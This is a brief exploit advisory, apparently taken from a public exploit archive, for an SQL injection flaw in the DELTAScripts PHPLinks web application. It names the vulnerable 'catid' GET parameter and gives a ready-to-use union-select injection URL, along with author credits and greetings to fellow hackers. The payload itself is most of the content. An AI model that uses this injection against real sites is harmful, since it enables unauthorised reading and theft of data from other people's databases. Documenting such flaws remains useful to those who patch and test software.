1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
/* Name : DELTAScripts PHPLinks Vuln : SQL Injection Author : Hamza 'MizoZ' N. Email : mizozx[at]gmail[dot]com WebSite : www.greymen.org<http://www.greymen.org/> Greetz : Zuka, all friends & arab hackers */ Vulnerability is in the $_GET['catid'] http://server/[PATH]/index.php?catid=8+union+all+select+1,2,3,4,5,6-- |